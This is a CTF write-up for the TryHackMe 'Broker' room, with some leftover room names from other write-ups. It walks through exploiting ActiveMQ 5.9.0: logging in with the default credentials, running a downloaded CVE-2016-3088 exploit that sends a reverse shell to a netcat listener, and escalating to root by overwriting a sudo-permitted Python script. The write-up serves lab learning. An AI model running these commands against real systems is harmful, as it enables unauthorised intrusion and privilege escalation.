Broker Writeup

TryHackMe: Easy Peasy created by @M0N573R777 and @ripcurlz

The creator give us many hints on this room, starting with the room description,notes and flag hints.

Description

Paul and Max use a rather unconventional way to chat. They do not seem to know
that eavesdropping is possible though…

Task 2 Enumeration & flags
Paul and Max found a way to chat at work by using a certain kind of software.
They think they outsmarted their boss, but do not seem to know that eavesdropping
is quite possible…They better be careful…

Do a TCP portscan on all ports with port number greater than 1000 and smaller
than 10000! Which TCP ports do you find to be open? (counting up)

Hint: nmap -p1001-9999 IP

What is the name of the software they use?

Hint: running on one of the ports you found in question 1

Which videogame are Paul and Max talking about?
Use a MQTT client. Note: MQTT Explorer does not work. Also only use MQTT
version 3.1 as the protocol version.

flag.txt
CVE for the software you found in question 2

root.txt
/etc/sudoers

Also, other important hint is see how TryHackMe classify this room. Go in “All Rooms”and search for this especific room. This one was classified as message broker.

First, you need choose if you want to add a domain entry in /etc/hosts or use the room IP directly on each command. For the sake of simplicity of this writeup I choose add the domain name dogcat.thm into my /etc/hosts.

echo "[Room IP]      broker.thm" | sudo tee -a /etc/hosts

Let’s follow the basic hacker methodology

In this room we will use the 3 first steps from basic hacker methodology that are recon, exploitation and privilege elevation.

Phase 1: recon

Start scanning for open ports and running services.

sudo nmap -sS -sV -T4 --open -Pn -p 1000-10000 broker.thm

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-11 07:43 EST
Nmap scan report for broker.thm (10.10.56.121)
Host is up (0.15s latency).
Not shown: 8999 closed ports
PORT     STATE SERVICE VERSION
1883/tcp open  mqtt?
8161/tcp open  http    Jetty 7.6.9.v20130131

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.08 seconds

There are 2 open ports. Port 1883 is used for mqtt? and port 8161 for Jetty. Searching in the web, Jettty is a Java HTTP Web Server and mqtt refers to Message Queuing Telemetry Transport, some publish-subscribe network protocol.

Opening the browser on port 8161.

Clicking in “Manage ActiveMQ broker” we receive a basic authentication window.

Phase 2: exploitation

Always when you find some default page with authentication, it is valid to searchfor default passwords. In this case, I found that the defaultcredentials are username admin, password admin.

Apache ActiveMQ default administrative credentials

We are in the ActiveMQ admin page, the version is 5.9.0. Searching in the Exploit Database I found a Metasploit script to explore for this service and version. Apache ActiveMQ 5.x-5.11.1 – Directory Traversal Shell Upload (Metasploit), unfortunately this script does not work on this host.

Searching a little more, I found this page that describe the Analysis of Apache ActiveMQ Remote Code Execution Vulnerability (CVE-2016–3088) and explain how to explore this vulnerability.

For me this was the way, I do recommend to you to look the page and learn all the steps needed to explore this vulnerability.

But, after finishing this room I create a simple exploit to do this work automatically.

So, let’s do it.

wget https://raw.githubusercontent.com/cyberaguiar/CVE-2016-3088/main/exploit_activemq.py

Open a new terminal window and start a netcat service.

nc -nvlp 1234

This is the script.

python3 exploit_activemq.py
Developed by @cyberaguiar - www.cyberaguiar.com
-----------------------------------------------------------------------
** Disclaimer **
-----------------------------------------------------------------------
The developer of this script are not responsible for any misuse of this
exploit we only encourage the ethical use of this script and to be used
only when authorised to do so during an penetration test or similar. Any
damages or misuse of this script is the responsibility of the individuals
who use them unethically or with the intent to damage property.
-----------------------------------------------------------------------

USAGE: python exploit_activemq.py rhost rport username password lhost lport

You will need replace the local VPN IP to your one in the command below.

python3 exploit_activemq.py broker.thm 8161 admin admin 10.6.10.10 1234

Voilà, whe have shell.

Start a nice bash shell whit python3.

python3 -c "import pty;pty.spawn('/bin/bash')"; export TERM=xterm

Before continue, there is a question in the room about the game that Paul and Maxwere talking about. Maybe the room creators expect that we use a mqtt client andto the queue service to read those messages. As we go directly to the server, thiswas not needed, but, in the end of this writeup I will show how doing it.

ls -l

total 9968
-rw-r--r-- 1 activemq activemq    40580 Oct 14  2013 LICENSE
-rw-r--r-- 1 activemq activemq     3334 Oct 14  2013 NOTICE
-rw-r--r-- 1 activemq activemq     2610 Oct 14  2013 README.txt
-rwxr-xr-x 1 activemq activemq 10105484 Oct 14  2013 activemq-all-5.9.0.jar
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 bin
-rw-rw-r-- 1 activemq activemq     1443 Dec 25 17:50 chat.py
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 conf
drwxr-xr-x 1 activemq activemq     4096 Dec 26 04:45 data
-rw-r--r-- 1 activemq activemq       23 Dec 25 18:16 flag.txt
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 lib
-r-x------ 1 activemq activemq      143 Dec 25 17:50 start.sh
-rw-rw-r-- 1 activemq activemq      768 Dec 25 17:50 subscribe.py
drwxr-sr-x 5 activemq activemq     4096 Mar 11 12:39 tmp
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 webapps

Here is the flag.txt, also give a look at the chat.py file. Inside there are themessages from Paul and Max chatting about the some videogame.

Last step.

Phase 3: privilege elevation

sudo -l

Matching Defaults entries for activemq on activemq:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User activemq may run the following commands on activemq:
    (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
ls -lha /opt/apache-activemq-5.9.0/subscribe.py

<.0$ ls -lha /opt/apache-activemq-5.9.0/subscribe.py
-rw-rw-r-- 1 activemq activemq 768 Dec 25 17:50 /opt/apache-activemq-5.9.0/subscribe.py

You can execute the script above and also have write access to the file. Now let’sreplace the content of the script to make it execute bash as root.

echo "import pty;pty.spawn('/bin/bash')" > /opt/apache-activemq-5.9.0/subscribe.py
sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py

<n/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
[email protected]:/# cat /root/root.txt
cat /root/root.txt
ROOT_FLAG

Optional step, read the messages from ActiveMQ using a MQTT client

Download this mqtt client

git clone https://github.com/bapowell/python-mqtt-client-shell

Cloning into 'python-mqtt-client-shell'...
remote: Enumerating objects: 111, done.
remote: Total 111 (delta 0), reused 0 (delta 0), pack-reused 111
Receiving objects: 100% (111/111), 35.95 KiB | 624.00 KiB/s, done.
Resolving deltas: 100% (65/65), done.
cd python-mqtt-client-shell

python3 mqtt_client_shell.py

Welcome to the MQTT client shell.
Type help or ? to list commands.
Pressing <Enter> on an empty line will repeat the last command.

Client args: client_id=paho-6315-kali, clean_session=True, protocol=4 (MQTTv3.1.1), transport=tcp
Logging: on (indent=30), Recording: off, Pacing: 0
> python-mqtt-client-shell

Now execute the commands below.

protocol 3
connection
host broker.thm
connect
subscribe #

Done, now you are connected and the messages will start rolling up.

That is it guys and girls, we done.

See ya in the next challenge.